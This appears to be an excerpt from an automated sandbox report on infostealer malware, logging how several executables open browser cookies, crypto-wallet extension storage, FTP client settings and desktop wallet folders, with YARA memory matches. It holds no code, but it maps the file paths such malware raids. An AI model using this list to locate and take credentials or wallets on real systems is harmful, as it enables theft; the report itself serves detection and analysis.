Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Directory queried: number of queries: 1666

Source: Yara match	File source: 00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2594123989.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2593346442.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2626495178.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2579817622.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2625482551.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2814519497.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2618539870.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2626432893.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
